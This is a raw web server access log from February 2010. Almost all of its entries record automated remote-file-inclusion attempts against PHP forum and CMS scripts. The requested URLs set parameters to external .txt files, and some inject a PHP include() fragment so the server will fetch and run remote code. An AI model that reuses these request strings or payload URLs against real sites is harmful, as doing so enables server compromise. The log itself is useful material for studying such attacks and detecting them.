213.189.27.154 - - [20/Feb/2010:07:56:53 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [20/Feb/2010:07:57:17 -0800] "GET /logs/access_100214.log//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:07:58:26 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.27.154 - - [20/Feb/2010:07:58:27 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:59:30 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:59:37 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:59:37 -0800] "GET /logs/access_100129.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:59:38 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:59:41 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:59:41 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:59:41 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:59:45 -0800] "GET /logs/access_100129.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:59:45 -0800] "GET /logs/access_100129.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:59:48 -0800] "GET /logs/access_100202.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:59:48 -0800] "GET /logs/access_100202.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:07:59:50 -0800] "GET /logs/access_100202.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:00:01 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:00:01 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:00:01 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:00:02 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.182.41.225 - - [20/Feb/2010:08:00:02 -0800] "GET /logs/access.log/index.php?sayfa=http://www.maakmuziek.nl/images/demo.jpg? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
64.182.41.225 - - [20/Feb/2010:08:00:03 -0800] "GET /logs/index.php?sayfa=http://www.maakmuziek.nl/images/demo.jpg? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:00:20 -0800] "GET /logs/access_100129.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:00:20 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:00:24 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:00:30 -0800] "GET /logs/access_100115.log/secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:00:30 -0800] "GET /logs/secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:00:30 -0800] "GET /secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:00:33 -0800] "GET /logs/access_100202.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:00:50 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:00:50 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:00:51 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:00:54 -0800] "GET /logs/access_100115.log/secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:00:54 -0800] "GET /secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:00:54 -0800] "GET /logs/secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:00:56 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:00:59 -0800] "GET /logs/access_100115.log/secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:00:59 -0800] "GET /secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:00:59 -0800] "GET /logs/secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:01:07 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:01:07 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:01:09 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:01:33 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:01:34 -0800] "GET /logs/access.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:01:34 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:01:34 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.182.41.225 - - [20/Feb/2010:08:01:34 -0800] "GET /logs/access_100117.log/index.php?sayfa=http://www.maakmuziek.nl/images/demo.jpg? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:01:40 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:01:40 -0800] "GET /logs/access.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:01:40 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:01:44 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:01:46 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:01:46 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:01:48 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:02:04 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:02:05 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:02:05 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:02:12 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:02:48 -0800] "GET /logs/access_100205.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:02:50 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:02:51 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:02:51 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:03:05 -0800] "GET /logs/access_100205.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [20/Feb/2010:08:03:09 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.249.65.104 - - [20/Feb/2010:08:03:25 -0800] "GET /atesh_info/nt.php?t=1734069740 HTTP/1.1" 200 61 "-" "Googlebot-Image/1.0" "www.atesh.info"
64.202.102.218 - - [20/Feb/2010:08:03:43 -0800] "GET /skin/zero_vote/login.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [20/Feb/2010:08:03:43 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [20/Feb/2010:08:03:43 -0800] "GET /logs/access_100126.log%20%20//skin/zero_vote/login.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [20/Feb/2010:08:03:49 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [20/Feb/2010:08:03:50 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:03:55 -0800] "GET /logs/access_100115.log%20%20/secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:03:55 -0800] "GET /secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:03:55 -0800] "GET /logs/secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [20/Feb/2010:08:03:58 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [20/Feb/2010:08:03:59 -0800] "GET /logs/access_100126.log%20%20//skin/zero_vote/login.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:15 -0800] "GET /index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:15 -0800] "GET /logs/access_100119.log//index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:15 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:15 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:15 -0800] "GET /logs/access_100210.log//index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:16 -0800] "GET /index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:16 -0800] "GET /logs/access_100210.log//index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:16 -0800] "GET /logs/access_100119.log//index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:18 -0800] "GET /index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:19 -0800] "GET /logs/access_100119.log%20%20//index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:19 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:21 -0800] "GET /logs/access_100119.log%20%20//index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:21 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:21 -0800] "GET /index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:24 -0800] "GET /logs/access.log%20%20//index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [20/Feb/2010:08:04:26 -0800] "GET /logs/access.log%20%20//index.php?option=com_custompages&cpage=http://www.hetweeshuis.nl/components/com_puter/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:04:52 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:04:52 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:04:54 -0800] "GET /logs/access_100205.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.182.41.225 - - [20/Feb/2010:08:05:09 -0800] "GET /index.php?sayfa=http://www.maakmuziek.nl/images/demo.jpg? HTTP/1.0" 200 3626 "-" "libwww-perl/5.53" "www.puaga.com"
211.192.139.164 - - [20/Feb/2010:08:05:19 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:08:05:29 -0800] "GET /logs//common/db.php?commonpath=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.211.138.220 - - [20/Feb/2010:08:05:29 -0800] "GET /logs/access_100131.log//common/db.php?commonpath=http://ticcamp.co.kr/hex/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:05:38 -0800] "GET /logs/secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:05:38 -0800] "GET /logs/access_100115.log%20%20/secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:05:41 -0800] "GET /secure_img_render.php?p=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:08:06:03 -0800] "GET /logs/access_100117.log%20%20/index.php?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [20/Feb/2010:08:06:13 -0800] "GET /logs//bbs/deletes_all.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
